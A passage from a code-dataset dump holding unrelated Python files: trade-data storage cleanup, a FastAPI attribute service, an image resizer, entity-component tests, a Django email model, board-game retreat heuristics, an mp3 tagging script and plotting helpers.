candle=candle,\n timestamp=daily_ts_from,\n frequency=Frequency.DAY,\n )\n daily_cache.json_data = (\n target_cache.order_by(\"-timestamp\").first().json_data\n )\n daily_cache.save()\n target_cache.delete()\n logging.info(\n _(\"Converted {date} to daily\").format(\n **{\"date\": daily_ts_from.date()}\n )\n )\n\n\ndef convert_trade_data_to_hourly(\n symbol: Symbol, timestamp_from: datetime.datetime, timestamp_to: datetime.datetime\n):\n \"\"\"Convert trade data, by minute, to hourly.\"\"\"\n trade_data = TradeData.objects.filter(\n symbol=symbol,\n frequency=Frequency.MINUTE,\n )\n t = trade_data.filter(timestamp__gte=timestamp_from, timestamp__lte=timestamp_to)\n if t.exists():\n first = t.first()\n last = t.last()\n min_timestamp_from = first.timestamp\n if timestamp_from < min_timestamp_from:\n timestamp_from = min_timestamp_from\n max_timestamp_to = last.timestamp + pd.Timedelta(f\"{last.frequency}t\")\n if timestamp_to > max_timestamp_to:\n timestamp_to = max_timestamp_to\n for daily_ts_from, daily_ts_to in iter_timeframe(\n timestamp_from, timestamp_to, value=\"1d\", reverse=True\n ):\n 
for hourly_ts_from, hourly_ts_to in iter_timeframe(\n daily_ts_from, daily_ts_to, value=\"1h\", reverse=True\n ):\n delta = hourly_ts_to - hourly_ts_from\n total_minutes = delta.total_seconds() / Frequency.HOUR\n if total_minutes == Frequency.HOUR:\n minutes = trade_data.filter(\n timestamp__gte=hourly_ts_from, timestamp__lt=hourly_ts_to\n )\n if minutes.count() == Frequency.HOUR:\n data_frames = {\n t: t.get_data_frame() for t in minutes if t.file_data.name\n }\n for t, data_frame in data_frames.items():\n data_frame[\"uid\"] = \"\"\n # Set first index.\n uid = data_frame.columns.get_loc(\"uid\")\n data_frame.iloc[:1, uid] = t.uid\n if len(data_frames):\n filtered = pd.concat(data_frames.values())\n else:\n filtered = pd.DataFrame([])\n candles = candles_api(symbol, hourly_ts_from, hourly_ts_to)\n validated = validate_data_frame(\n hourly_ts_from,\n hourly_ts_to,\n filtered,\n candles,\n symbol.should_aggregate_trades,\n )\n # First, delete minutes, as naming convention is same as hourly.\n minutes.delete()\n # Next, create hourly\n TradeData.write(\n symbol,\n hourly_ts_from,\n hourly_ts_to,\n filtered,\n validated,\n )\n logging.info(\n _(\n \"Converted {timestamp_from} {timestamp_to} to hourly\"\n ).format(\n **{\n \"timestamp_from\": hourly_ts_from,\n \"timestamp_to\": hourly_ts_to,\n }\n )\n )\n\n\ndef clean_trade_data_with_non_existing_files(\n symbol: Symbol, timestamp_from: datetime.datetime, timestamp_to: datetime.datetime\n) -> None:\n \"\"\"Clean aggregated with non-existing files.\"\"\"\n logging.info(_(\"Checking objects with non existent files\"))\n\n trade_data = (\n TradeData.objects.filter(symbol=symbol)\n .exclude(file_data=\"\")\n .filter(\n timestamp__gte=timestamp_from,\n timestamp__lte=timestamp_to,\n )\n .only(\"frequency\", \"file_data\")\n )\n count = 0\n deleted = 0\n total = trade_data.count()\n for obj in trade_data:\n count += 1\n if not obj.file_data.storage.exists(obj.file_data.name):\n obj.delete()\n deleted += 1\n logging.info(\n _(\"Checked {count}/{total} objects\").format(\n **{\"count\": count, \"total\": total}\n )\n )\n\n logging.info(_(\"Deleted {deleted} objects\").format(**{\"deleted\": deleted}))\n\n\ndef clean_unlinked_trade_data_files(\n symbol: Symbol, timestamp_from: datetime.datetime, timestamp_to: datetime.datetime\n) -> None:\n \"\"\"Clean unlinked trade data files.\"\"\"\n logging.info(_(\"Checking unlinked trade data files\"))\n\n deleted = 0\n trade_data = (\n TradeData.objects.filter(symbol=symbol).exclude(file_data=\"\").only(\"file_data\")\n )\n t = trade_data.filter(\n timestamp__gte=timestamp_from,\n timestamp__lte=timestamp_to,\n )\n if t.exists():\n min_timestamp_from = t.first().timestamp\n if timestamp_from < min_timestamp_from:\n timestamp_from = min_timestamp_from\n max_timestamp_to = t.last().timestamp\n if timestamp_to > max_timestamp_to:\n timestamp_to = max_timestamp_to\n for daily_timestamp_from, daily_timestamp_to in iter_timeframe(\n timestamp_from, timestamp_to, value=\"1d\"\n ):\n expected_files = [\n os.path.basename(obj.file_data.name)\n for obj in trade_data.filter(\n timestamp__gte=daily_timestamp_from,\n timestamp__lte=daily_timestamp_to,\n )\n ]\n\n dummy = TradeData(symbol=symbol, timestamp=daily_timestamp_from)\n storage = dummy.file_data.storage\n directory, __ = os.path.split(upload_trade_data_to(dummy, \"dummy.parquet\"))\n __, filenames = storage.listdir(directory)\n\n should_delete = [\n filename for filename in filenames if filename not in expected_files\n ]\n for filename in should_delete:\n 
storage.delete(os.path.join(directory, filename))\n deleted += 1\n\n logging.info(\n _(\"Checked {date}\").format(**{\"date\": daily_timestamp_from.date()})\n )\n\n logging.info(\n _(\"Deleted {deleted} unlinked files\").format(**{\"deleted\": deleted})\n )\n","sub_path":"quant_candles/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":9729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"308013460","text":"my_set = {4, 2, 6}\n#subset = [{}, {4}, {2}, {6}, {4, 2}, {4, 6}, {2, 6}]\n\n\n#{}\n\n#{}, {4}\n#{}, {4}, {2}, {4, 2}\n#{}, {4}, {2}, {4, 2}, {6}, {4, 6}, {2, 6}, {4,2,6}\n\n\n#get_all_sebset{current_set, current_element}:\n # create copy of current_set\n # for all set in set list create a new set list by appedning the current_element\n # return current_set + next_set\n\n#get_all_subset(current_set):\n # result set = {}\n # for all element in set\n # add temp_get_all_subset(element, result_set) in to result_set\n\n\ndef get_all_subset_for_element(set_list, element):\n temp_set_list = []\n for item in set_list:\n item2 = item.copy()\n item2.add(element)\n temp_set_list.append(item2)\n result = set_list + temp_set_list\n return result\n\n\ndef get_all_subset(my_set):\n result_set = [set({})]\n for elelment in my_set:\n result_set = get_all_subset_for_element(result_set, elelment)\n return result_set\n\nprint(get_all_subset(my_set))\n","sub_path":"Python_Projects/6-Google codejam/get_all_subset.py","file_name":"get_all_subset.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"537308582","text":"from typing import List\nfrom fastapi.exceptions import HTTPException\nimport pydantic\nfrom sqlalchemy import select, and_\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom ..models import Attribute, BooleanAttribute, IntegerAttribute, FloatAttribute, StringAttribute\nfrom ..interfaces import *\nfrom sqlalchemy.orm import with_polymorphic\nfrom sqlalchemy.exc import IntegrityError\nfrom pydantic import parse_obj_as\n\nselect_attribute = with_polymorphic(Attribute, [BooleanAttribute, IntegerAttribute, FloatAttribute, StringAttribute])\n\n\nasync def query_attributes(session: AsyncSession, key: str, remote_reference: str):\n filters = {}\n if remote_reference:\n filters['remote_reference'] = remote_reference\n if key:\n filters['key'] = key\n result = await session.execute(select(select_attribute).filter_by(**filters))\n return result.scalars().all()\n\n\nasync def query_attribute_by_id(session: AsyncSession, id: int):\n \n result = await session.execute(select(select_attribute).where(Attribute.id == id))\n return result.scalars().one()\n\n\nasync def query_attribute_by_remote_and_id(session: AsyncSession, remote_reference: str, id: int) -> Attribute:\n result = await session.execute(\n select(select_attribute)\n .where(\n and_(\n Attribute.remote_reference == remote_reference,\n Attribute.id == id\n )\n )\n )\n return result.scalars().one()\n\n\nasync def query_attribute_by_remote_and_key(session: AsyncSession, remote_reference: str, key: str) -> Attribute:\n result = await session.execute(\n select(select_attribute)\n .where(\n and_(\n Attribute.remote_reference == remote_reference,\n Attribute.key == key\n )\n )\n )\n return result.scalars().one()\n\n\nasync def query_attributes_by_remote(session: AsyncSession, remote_reference: str) -> List[Attribute]:\n result = await session.execute(\n select(select_attribute)\n .where(\n and_(\n Attribute.remote_reference == remote_reference,\n )\n )\n )\n return result.scalars().all()\n\n\n\nasync def insert_attribute(session: AsyncSession, attribute: AttributeIn):\n\n v = attribute.value\n\n # The order of this is sensitive\n if isinstance(v, bool):\n new = BooleanAttribute(type=bool.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n elif isinstance(attribute.value, int):\n new = IntegerAttribute(type=int.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n elif isinstance(attribute.value, float):\n new = FloatAttribute(type=float.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n elif isinstance(attribute.value, str):\n new = StringAttribute(type=str.__name__, remote_reference=attribute.remote_reference, key=attribute.key, value=attribute.value)\n else:\n raise HTTPException(501, detail={\n \"status\": \"NOT_IMPLMENTED\",\n \"message\": \"Value must be of a type int, float, bool or string\"\n })\n try:\n session.add(new)\n await session.commit()\n return parse_obj_as(AttributeOut, new)\n except IntegrityError:\n attribute_query = with_polymorphic(Attribute, [BooleanAttribute, IntegerAttribute, FloatAttribute, StringAttribute])\n found_attr = session.execute(select(attribute_query).where(\"attribute.key\" == attribute.key))\n raise HTTPException(303, detail={\n \"status\": \"ALREADY_EXISTS\",\n \"message\": \"Attribute already exisits follow Location\"\n 
})","sub_path":"app/services/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"75075467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport click\nfrom PIL import Image\nfrom utils.misc import get_file_list\nimport re\n\n\ndef validate_dim(ctx, param, value):\n percents = False\n if value.endswith('%'):\n value = value[:-1]\n percents = True\n if not re.match(r'^\\d{1,6}(\\.\\d{1,6})?$', value):\n raise click.BadParameter('invalid value')\n value = float(value)\n if value == 0:\n raise click.BadParameter('invalid value')\n return value, percents\n\n\n@click.command()\n@click.argument('path', type=click.Path(exists=True))\n@click.argument('w', callback=validate_dim)\n@click.argument('h', callback=validate_dim)\ndef resize(path, w, h):\n \"\"\"\n Resize all images in the given folder and all sub folders.\n Width and Height can be integer or float values in pixels or percents: 10, 12.5, 80%, 20.5%.\n Result size will be rounded to integer.\n \"\"\"\n for f in get_file_list(path):\n im = Image.open(f).convert('RGBA')\n new_w = int(round(im.size[0] * w[0] / 100. if w[1] else w[0]))\n new_h = int(round(im.size[1] * h[0] / 100. if h[1] else h[0]))\n new_im = im.resize((new_w, new_h), Image.LANCZOS)\n new_im.save(f)\n\n\nif __name__ == '__main__':\n resize()\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"190508210","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_rui\n----------------------------------\n\nTests for `rui` module.\n\"\"\"\n\nimport sys\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\nfrom rui.rui import Component, System, World\nfrom rui.exceptions import (DuplicateEntityError, DuplicateSystemError,\n UnmanagedEntityError, UnmanagedSystemError,\n NonUniqueTagError, DeadEntityError)\n\n\nclass Counter(Component):\n def __init__(self, count):\n self.count = count\n\n\nclass Empty(Component):\n def __init__(self):\n pass\n\n\nclass CountSystem(System):\n def process(self, delta):\n entities = self.world.get_entities_by_components(Counter)\n\n for entity in entities:\n entity.get_component(Counter).count += (1 * delta)\n\n\nclass TestRui(unittest.TestCase):\n\n def setUp(self):\n self.world = World()\n\n ## Testing Components\n def test_add_component(self):\n entity = self.world.create_entity()\n counter = Counter(0)\n replaceCounter = Counter(1)\n entity.add_component(counter)\n self.assertTrue(counter in entity.get_components())\n getCounter = entity.get_component(Counter)\n self.assertEqual(counter, getCounter)\n self.assertEqual(getCounter.count, 0)\n entity.add_component(replaceCounter)\n self.assertTrue(counter in entity.get_components())\n getCounter = entity.get_component(Counter)\n self.assertEqual(replaceCounter, getCounter)\n self.assertEqual(getCounter.count, 1)\n\n def test_get_entites_by_components(self):\n entity = self.world.create_entity()\n entity.add_component(Counter(0))\n entity.add_component(Empty())\n empty_entity = self.world.create_entity()\n empty_entity.add_component(Empty())\n self.world.add_entity(entity)\n self.world.add_entity(empty_entity)\n\n partial_entities = self.world.get_entities_by_components(Counter)\n self.assertEqual(len(partial_entities), 1)\n\n full_entities = self.world.get_entities_by_components(Counter, Empty)\n self.assertEqual(len(full_entities), 1)\n self.assertEqual(full_entities, partial_entities)\n\n empty_entities = self.world.get_entities_by_components(Empty)\n self.assertEqual(len(empty_entities), 2)\n self.assertTrue(empty_entity in empty_entities)\n\n ## Testing Entities\n def test_add_entity(self):\n entity = self.world.create_entity()\n self.world.add_entity(entity)\n self.assertTrue(entity in self.world.get_entities())\n\n def test_entity_tag(self):\n noTagEntity = self.world.create_entity()\n tagEntity = self.world.create_entity('TAG')\n self.world.add_entities(noTagEntity, tagEntity)\n self.assertNotEqual(noTagEntity, self.world.get_entity_by_tag('TAG'))\n self.assertEqual(tagEntity, self.world.get_entity_by_tag('TAG'))\n\n def test_groups(self):\n inGroupEntity = self.world.create_entity()\n inGroupEntity2 = self.world.create_entity()\n notInGroupEntity = self.world.create_entity()\n self.world.add_entity(inGroupEntity)\n self.world.add_entity(inGroupEntity2)\n self.world.add_entity(notInGroupEntity)\n self.world.register_entity_to_group(inGroupEntity, 'GROUP')\n self.world.register_entity_to_group(inGroupEntity2, 'GROUP')\n group = self.world.get_group('GROUP')\n self.assertTrue(inGroupEntity in group)\n self.assertTrue(inGroupEntity2 in group)\n self.assertFalse(notInGroupEntity in group)\n\n def test_kill_entity(self):\n entity = self.world.create_entity('KILL')\n self.world.add_entity(entity)\n self.world.register_entity_to_group(entity, 'DYING')\n self.assertEquals(len(self.world.get_group('DYING')), 1)\n self.assertTrue(entity in 
self.world.get_entities())\n entity.kill()\n self.assertFalse(entity in self.world.get_entities())\n self.assertEquals(len(self.world.get_group('DYING')), 0)\n\n entity = self.world.create_entity('KILL')\n self.world.add_entity(entity)\n self.world.register_entity_to_group(entity, 'DYING')\n self.assertEquals(len(self.world.get_group('DYING')), 1)\n self.assertTrue(entity in self.world.get_entities())\n self.world.remove_entity(entity)\n self.assertFalse(entity in self.world.get_entities())\n self.assertEquals(len(self.world.get_group('DYING')), 0)\n with self.assertRaises(DeadEntityError):\n entity.kill()\n\n ## Testing Systems\n def test_add_system(self):\n entity = self.world.create_entity()\n entity.add_component(Counter(0))\n self.world.add_entity(entity)\n count_system = CountSystem()\n self.world.add_system(count_system)\n count_system.process(1)\n self.assertEqual(entity.get_component(Counter).count, 1)\n self.world.process()\n self.assertEqual(entity.get_component(Counter).count, 2)\n\n def test_remove_system(self):\n entity = self.world.create_entity()\n entity.add_component(Counter(0))\n self.world.add_entity(entity)\n count_system = CountSystem()\n self.world.add_system(count_system)\n self.world.process()\n self.assertEqual(entity.get_component(Counter).count, 1)\n self.world.remove_system(count_system)\n self.world.process()\n self.assertEqual(entity.get_component(Counter).count, 1)\n\n ## Test Exceptions\n def test_duplicate_entity_error(self):\n entity = self.world.create_entity()\n self.world.add_entity(entity)\n with self.assertRaises(DuplicateEntityError):\n self.world.add_entity(entity)\n\n def test_duplicate_system_error(self):\n count_system = CountSystem()\n duplicateCountSystem = CountSystem()\n self.world.add_system(count_system)\n with self.assertRaises(DuplicateSystemError):\n self.world.add_system(count_system)\n self.world.add_system(duplicateCountSystem)\n\n def test_unmanaged_entity_error(self):\n entity = self.world.create_entity()\n with self.assertRaises(UnmanagedEntityError):\n self.world.register_entity_to_group(entity, 'GROUP')\n self.world.add_entity(entity)\n self.world.register_entity_to_group(entity, 'GROUP')\n\n def test_unmanaged_system_error(self):\n count_system = CountSystem()\n with self.assertRaises(UnmanagedSystemError):\n self.world.remove_system(count_system)\n self.world.add_system(count_system)\n self.world.remove_system(count_system)\n\n def test_non_unique_tag_error(self):\n entity = self.world.create_entity('TAG')\n self.world.add_entity(entity)\n nonUniqueEntity = self.world.create_entity('TAG')\n otherEntity = self.world.create_entity('FAKE')\n self.world.add_entity(otherEntity)\n\n with self.assertRaises(NonUniqueTagError):\n self.world.add_entity(nonUniqueEntity)\n self.world.get_entity_by_tag('FAKE').set_tag('TAG')\n\n def tearDown(self):\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_rui.py","file_name":"test_rui.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"635468095","text":"from django.http import HttpResponse\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.contrib import admin\n\n\nclass Email(models.Model):\n email = models.EmailField(max_length=200)\n\n def __unicode__(self):\n return u'<\"%s\">' % self.email\n\nadmin.site.register(Email)\n\ndef proc_email(email_addy, log):\n log.info('Processing: %r', email_addy)\n\n try:\n em = Emails.objects.get(email=email_addy)\n\n except Emails.DoesNotExist:\n log.info('New email: %r', email_addy)\n em = Emails(email=email_addy)\n try:\n em.clean_fields()\n except ValidationError:\n log.warning('Invalid address: %r', em)\n else:\n em.save()\n log.info('Created: %s', em)\n\n else:\n log.info('Duplicate email: %s', em)\n\n return HttpResponse(\n \"%r, please.\" % (email_addy,),\n mimetype=\"text/plain\"\n )\n","sub_path":"juvume/splash/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"624519345","text":"import simulations\nimport blocks\nimport weighted_prob\nimport region_danger\nimport play_game\ndef find_location(board, blok):\n\t'''\n\tThis function takes a board object and the name of a block\n\tand returns a region object where the block is\n\t'''\n\n\t\n\tfor region in board.regions:\n\t\tfor bllock in region.blocks_present:\n\t\t\t\n\t\t\tif bllock.name == blok.name:\n\t\t\t\treturn region\n\ndef retreat(board, regionID, locations, simulation_dict, is_attacking, turn, combat_dict={}):\n\t'''\n\tThis function is meant to calculate a weight to whether or not \n\tthe computer opponent should retreat at any point during\n\ta battle. regionID is a region ID, paths is a list of the possible\n\tpaths of retreating, simulation_dict contains the win percentages from\n\tthe simulations and average strength lost values. is_attacking is a boolean\n\tthat is True if the computer is attacking and False if the computer is\n\tdefending\n\t'''\n\n\tif len(combat_dict) == 0:\n\t\tplay_game.set_up_combat_dict(board,board.regions[regionID])\n\t\tcombat_dict = board.regions[regionID].combat_dict\n\n\n\n\tif(len(combat_dict['Attacking']) == 0 or len(combat_dict['Defending']) == 0):\n\n\t\treturn_dict = {'Staying value ': 10}\n\t\treturn return_dict\n\n\n\t#Valuable Blocks and respective weights\n\tvaluable_blocks = {'WALLACE':18, 'KING':22, 'EDWARD':16, 'HOBELARS':13}\n\n\tif (is_attacking and combat_dict['Attacking'][0].allegiance == 'ENGLAND') or (not is_attacking and combat_dict['Defending'][0].allegiance == 'ENGLAND'):\n\n\t\trole = 'ENGLAND'\n\n\telse:\n\n\t\trole = 'SCOTLAND'\n\n\tstaying_value = value_of_location(board, regionID, role) * 1.3\n\n\tretreating_value = 0\n\n\tfriendly_block_names = list()\n\n\tfriendly_blocks = list()\n\n\tenemy_block_names = list()\n\n\tenemy_blocks = list()\n\n\treturn_dict = {'Staying value ': staying_value}\n\n\t\n\n\t#Add weight based on the difference is strength lost in the battle\n\tif is_attacking:\n\n\t\tstrength_dif = simulation_dict['Attacker strength lost'] - simulation_dict['Defender strength lost']\n\n\telif not is_attacking:\n\n\t\tstrength_dif = simulation_dict['Defender strength lost'] - simulation_dict['Attacker strength lost']\n\n\tif role == 'SCOTLAND':\n\n\t\tretreating_value += strength_dif * 4\n\n\telse:\n\n\t\tretreating_value += strength_dif * 2\n\n\n\n\t#Add weight based on the results of the simulation\n\n\tif not is_attacking:\n\n\t\tretreating_value += simulation_dict['attacker wins'] * 10\n\n\telse:\n\n\t\tretreating_value += simulation_dict['defender wins'] * 10\n\n\t\tretreating_value += simulation_dict['attacker retreats'] * 2\n\n\t#Create a list of friendly blocks in the current battle\n\tif is_attacking:\n\n\t\tfor block in combat_dict['Attacking']:\n\n\t\t\tfriendly_block_names.append(block.name)\n\t\t\tfriendly_blocks.append(block)\n\n\t\tfor block in combat_dict['Defending']:\n\n\t\t\tenemy_block_names.append(block.name)\n\t\t\tenemy_blocks.append(block)\n\n\telse:\n\n\t\tfor block in combat_dict['Defending']:\n\n\t\t\tfriendly_block_names.append(block.name)\n\t\t\tfriendly_blocks.append(block)\n\n\t\tfor block in combat_dict['Attacking']:\n\n\t\t\tenemy_block_names.append(block.name)\n\t\t\tenemy_blocks.append(block)\n\n\t#Check to see if any of the friendly blocks are the valuable blocks\n\tif len(friendly_blocks) == 0 and friendly_blocks[0].current_strength == 1:\n\t\tretreating_value += 10\n\n\tfor block_name in valuable_blocks:\n\n\t\tif block_name in 
friendly_block_names:\n\n\t\t\tretreating_value += valuable_blocks[block_name]\n\n\t\telif block_name in enemy_block_names:\n\n\t\t\tretreating_value += -.5 * valuable_blocks[block_name]\n\n\t#Weight if you are going to lose a noble\n\tfor block in friendly_blocks:\n\n\t\tif type(block) == blocks.Noble:\n\n\t\t\tretreating_value += noble_going_to_be_lost(board, block, role, turn) * -8\n\n\t\t\tretreating_value += noble_not_going_to_be_occupied(board, block, turn, role) * 8 \n\n\t#Weight if the enemy is going to lose a noble\n\tfor block in enemy_blocks:\n\n\t\tif type(block) == blocks.Noble:\n\n\t\t\tretreating_value += noble_going_to_be_lost(board, block, role, turn) * 6\n\n\t\t\tretreating_value += noble_not_going_to_be_occupied(board, block, turn, role) * -6\n\tif 'WALLACE' in friendly_block_names and len(enemy_blocks) == 1:\n\n\t\tretreating_value = 1\n\n\tfor location in locations:\n\n\t\treturn_dict[location] = value_of_location(board, location, role) * retreating_value\n\n\tfor key in return_dict:\n\t\t\n\t\tif return_dict[key] <= 0:\n\t\t\treturn_dict[key] = 0.000000001\n\n\treturn return_dict\n\n\n\ndef noble_going_to_be_lost(board, noble_object, role, turn):\n\t\"\"\"\n\treturns float\n\t1.0 means better chances of being lost\n\t0.0 means lower chances of being lost\n\tvery arbitrary numbers\n\tnot very good indication\n\t\"\"\"\n\n\tclose_to_winter = .2 * turn\n\tlost_flt = 0.0\n\tif type(noble_object.home_location) == int:\n\t\thome_location_tuple = (noble_object.home_location,)\n\telse:\n\t\thome_location_tuple = noble_object.home_location\n\n\t#checking who occupies it\n\tfor home_location_id in home_location_tuple:\n\t\tif board.regions[home_location_id].is_enemy(role):\n\t\t\tlost_flt += 0.7\n\t\telif board.regions[home_location_id].is_friendly(role):\n\t\t\tlost_flt += 0.03\n\t\telse:\n\t\t\tlost_flt += 0.2\n\n\t\t#checking who is around the noble_home_location\n\t\tcurrent_location = find_location(board, noble_object)\n\t\tfor regionID, border in enumerate(board.dynamic_borders[current_location.regionID]):\n\t\t\tif border != 0:\n\t\t\t\tif board.regions[regionID].is_enemy(role):\n\t\t\t\t\tlost_flt += 0.3\n\t\t\t\telif board.regions[regionID].is_friendly(role):\n\t\t\t\t\tlost_flt += .01\n\t\t\t\telse:\n\t\t\t\t\tlost_flt += .07\n\n\treturn lost_flt * close_to_winter\ndef noble_going_to_be_kept(board, noble_object, turn, role):\n\t\"\"\"\n\treturns between 0.0 and 1.0\n\t1.0 more likely to be kept\n\t\"\"\"\n\treturn (1 - noble_going_to_be_lost(board, noble_object, turn, role))\n\ndef noble_not_going_to_be_occupied(board, noble_object, turn, role):\n\t\"\"\"\n\treturns between 0.0 and 1.0\n\t1.0 home locatino more likely to be not occupied\n\t\"\"\"\n\tlost_flt = 0.0\n\tclose_to_winter = .2 * turn\n\tif type(noble_object.home_location) == int:\n\t\thome_location_tuple = (noble_object.home_location, )\n\telse:\n\t\thome_location_tuple = noble_object.home_location\n\n\t#checking who occupies it\n\tfor home_location_id in home_location_tuple:\n\t\tif board.regions[home_location_id].is_enemy(role):\n\t\t\tlost_flt += 0.05\n\t\telif board.regions[home_location_id].is_friendly(role):\n\t\t\tlost_flt += 0.05\n\t\telse:\n\t\t\tlost_flt += 0.7\n\n\t\t#checking who is around the noble_home_location\n\t\tcurrent_location = find_location(board, noble_object)\n\t\tfor regionID, border in enumerate(board.dynamic_borders[current_location.regionID]):\n\t\t\tif border != 0:\n\t\t\t\tif board.regions[regionID].is_enemy(role):\n\t\t\t\t\tlost_flt += 0.13\n\t\t\t\telif 
board.regions[regionID].is_friendly(role):\n\t\t\t\t\tlost_flt += 0.13\n\t\t\t\telse:\n\t\t\t\t\tlost_flt += 0.3\n\treturn lost_flt * close_to_winter\n\ndef value_of_location(current_board, regionID, role):\n\t\"\"\"\n\treturns float between 0.0 and 1.0\n\tROSS 0 F T 1\nGARMORAN 1 F T 0\nMORAY 2 F T 2\nSTRATHSPEY 3 T T 1 \nBUCHAN 4 F T 2\nLOCHABER 5 F T 1 \nBADENOCH 6 F F 2\nMAR 7 F F 1\nANGUS 8 F T 2\nARGYLL 9 F T 2\nATHOLL 10 F F 1\nFIFE 11 T T 2\nLENNOX 12 T T 1 \nMENTIETH 13 F T 3\nCARRICK 14 F T 1\nLANARK 15 F F 2\nLOTHIAN 16 F T 2\nDUNBAR 17 F T 2\nSELKIRK-FOREST 18 F F 0\nGALLOWAY 19 F T 1\nANNAN 20 F T 2\nTEVIOT 21 F F 1\nENGLAND 22 F T 0\n\t\"\"\"\n\tenemy_strength_lst = region_danger.table(current_board, role)\n\tvalue_lst = [22, 5, 14, 10, 30, 11, 15, 18, 37, 17, 21, 42, 27, 50, 11, 26, 13, 17, 5, 19, 15, 12, 11]\n\n\tfor i, number in enumerate(enemy_strength_lst):\n\t\tif number != -1:\n\t\t\tvalue_lst[i] -= number\n\t\tvalue_lst[i] = value_lst[i] / 50\n\t\tif value_lst[i] < 0:\n\t\t\tvalue_lst[i] = 0\n\t#print('VALUE ' + str(value_lst[regionID]))\n\treturn value_lst[regionID]\n\n\n\n\n\n\n\n\n\t\n\n\n\n\n","sub_path":"retreat.py","file_name":"retreat.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
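The weight dictionary that retreat() returns is presumably consumed by the weighted_prob module imported at the top of retreat.py. Below is a minimal sketch of how such a dict can be turned into a decision; the helper name and the commented call site are illustrative assumptions, not code from the original module:

```python
import random

def choose_retreat_option(weight_dict):
    # Keys are candidate retreat region IDs plus the special
    # 'Staying value ' entry (note the trailing space in that key).
    # All weights are positive because retreat() clamps them above 0.
    options = list(weight_dict.keys())
    weights = [weight_dict[key] for key in options]
    return random.choices(options, weights=weights, k=1)[0]

# Hypothetical call site:
# weights = retreat(board, 13, [11, 15], sim_results, is_attacking=True, turn=2)
# decision = choose_retreat_option(weights)
```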
+{"seq_id":"551261342","text":"# rename.py\n# This script uses mp3-tagger to fix the meta data on mp3 files that\n# cause mp3 players to wrongly categorize albums\n\n# REQUIREMENTS:\n# Install mp3-tagger at: https://pypi.org/project/mp3-tagger/\n\n# INSTRUCTIONS:\n# Put this file in the same directory as the songs\n# Make sure that songs are in an album directory that is in an artist directory\n# run the script\n\n\nimport os\nfrom mp3_tagger import MP3File, VERSION_1, VERSION_2, VERSION_BOTH\n\ndirname = os.getcwd()\nfiles = os.listdir(dirname)\n\ndir_list = dirname.split('\\\\')\nalbum_name = dir_list[-1]\nartist_name = dir_list[-2]\n\nsongs = []\nfor file in files:\n\tif file.endswith('.mp3'):\n\t\tsongs.append(file)\n\nprint(\"Working..\")\n\nfor song_path in songs:\n\taudio_file = MP3File(song_path)\n\taudio_file.set_version(VERSION_BOTH)\n\taudio_file.album = album_name\n\taudio_file.artist = artist_name\n\taudio_file.band = artist_name\n\taudio_file.save()\n\nprint(\"Done\")\n","sub_path":"album_sort/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550167184","text":"# conx - a neural network library\n#\n# Copyright (c) 2017 Douglas S. Blank \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor,\n# Boston, MA 02110-1301 USA\n\n\nimport base64\nimport io\nimport numpy as np\nimport copy\nfrom .utils import get_colormap\n\nfrom IPython.display import SVG\n\ntry:\n import matplotlib.pyplot as plt\nexcept:\n plt = None\n\ndef plot_f(f, frange=(-1, 1, .1), symbol=\"o-\"):\n \"\"\"\n Plot a function.\n \"\"\"\n xs = np.arange(*frange)\n ys = [f(x) for x in xs]\n plt.plot(xs, ys, symbol)\n plt.show()\n #bytes = io.BytesIO()\n #plt.savefig(bytes, format='svg')\n #svg = bytes.getvalue()\n #plt.close(fig)\n #return SVG(svg.decode())\n\ndef plot(lines, width=8.0, height=4.0, xlabel=\"time\", ylabel=\"\"):\n \"\"\"\n SVG(plot([[\"Error\", \"+\", [1, 2, 4, 6, 1, 2, 3]]],\n ylabel=\"error\",\n xlabel=\"hello\"))\n \"\"\"\n if plt is None:\n raise Exception(\"matplotlib was not loaded\")\n plt.rcParams['figure.figsize'] = (width, height)\n for (label, symbol, data) in lines:\n kwargs = {}\n args = [data]\n if label:\n kwargs[\"label\"] = label\n if symbol:\n args.append(symbol)\n plt.plot(*args, **kwargs)\n if any([line[0] for line in lines]):\n plt.legend()\n if xlabel:\n plt.xlabel(xlabel)\n if ylabel:\n plt.ylabel(ylabel)\n plt.show()\n #bytes = io.BytesIO()\n #plt.savefig(bytes, format='svg')\n #svg = bytes.getvalue()\n #plt.close(fig)\n #return 